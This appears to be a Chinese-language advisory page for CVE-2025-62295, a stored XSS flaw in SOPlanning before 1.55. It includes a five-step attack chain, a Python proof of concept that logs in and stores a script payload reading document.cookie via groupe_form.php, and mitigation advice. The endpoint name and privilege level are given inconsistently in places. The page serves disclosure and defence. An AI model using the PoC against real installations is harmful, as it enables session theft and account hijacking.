CVE-2025-62295 CVSS 5.4 中危

CVE-2025-62295 SOPlanning存储型XSS漏洞

披露日期: 2025-11-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-62295

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SOPlanning

漏洞概述

CVE-2025-62295是SOPlanning软件中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于/goupe_form端点，攻击者可以通过低权限账户在系统中注入恶意HTML和JavaScript代码。由于是存储型XSS，恶意代码会被永久保存在服务器端，当其他用户访问相关页面时，注入的脚本会自动执行。攻击者利用此漏洞可以窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或在受害者浏览器中执行任意操作。该漏洞CVSS评分为5.4，属于中等严重程度，需要用户交互才能触发。漏洞已于1.55版本中修复。

技术细节

该漏洞是典型的存储型XSS（Stored Cross-Site Scripting）漏洞，出现在SOPlanning的/goupe_form接口。攻击者以中等权限用户身份登录系统后，可以在表单提交过程中注入恶意JavaScript代码。由于应用程序未对用户输入进行充分的输入验证和输出编码，恶意脚本被存储在数据库中。当其他用户（如管理员或其他同事）访问编辑器页面或相关功能时，存储的恶意代码会被浏览器解析执行。攻击者可以利用此漏洞获取受害者的会话令牌，冒充合法用户进行操作，或者在网页中嵌入恶意重定向、钓鱼内容等。由于该漏洞需要用户交互（UI:R），攻击者通常需要诱骗受害者访问特定页面才能触发攻击。

攻击链分析

STEP 1

步骤1

攻击者以中等权限用户身份登录SOPlanning系统

STEP 2

步骤2

攻击者构造恶意XSS payload并通过/goupe_form端点提交，payload被存储在数据库中

STEP 3

步骤3

受害者（管理员或其他用户）访问编辑器页面或相关功能

STEP 4

步骤4

存储的恶意JavaScript代码在受害者浏览器中执行，窃取Cookie或执行其他恶意操作

STEP 5

步骤5

攻击者利用窃取的会话信息劫持用户账户或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-62295 PoC - Stored XSS in SOPlanning /groupe_form
# Target: SOPlanning <= 1.54

TARGET_URL = "http://target.com/soplanning"
USERNAME = "attacker"
PASSWORD = "password123"

session = requests.Session()

# Step 1: Login
login_url = f"{TARGET_URL}/login.php"
login_data = {
    "login": USERNAME,
    "password": PASSWORD
}
resp = session.post(login_url, data=login_data)

# Step 2: Inject XSS payload via /groupe_form endpoint
xss_payload = "<script>alert(document.cookie)</script>"
form_url = f"{TARGET_URL}/groupe_form.php"
form_data = {
    "group_name": xss_payload,
    "submit": "Save"
}
resp = session.post(form_url, data=form_data)

# Step 3: Trigger XSS when victim opens the editor
trigger_url = f"{TARGET_URL}/groupe_form.php?id=1"
print(f"[*] PoC deployed. Victim should visit: {trigger_url}")
print(f"[*] XSS Payload: {xss_payload}")

影响范围

SOPlanning < 1.55

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1) 在Web应用防火墙(WAF)中配置XSS防护规则，拦截恶意脚本；2) 限制/goupe_form端点的访问权限，仅允许受信任的管理员访问；3) 实施严格的输入验证，禁止在表单字段中输入HTML标签和JavaScript代码；4) 启用HTTPOnly和Secure标志保护Cookie，防止JavaScript访问；5) 监控应用日志，及时发现异常的脚本注入行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-62295
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-62295
3 Details https://www.cvedetails.com/cve/CVE-2025-62295/
4 VulDB https://vuldb.com/cve/CVE-2025-62295
5 Link https://cert.pl/en/posts/2025/11/CVE-2025-62293
6 Link https://www.soplanning.org/en/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表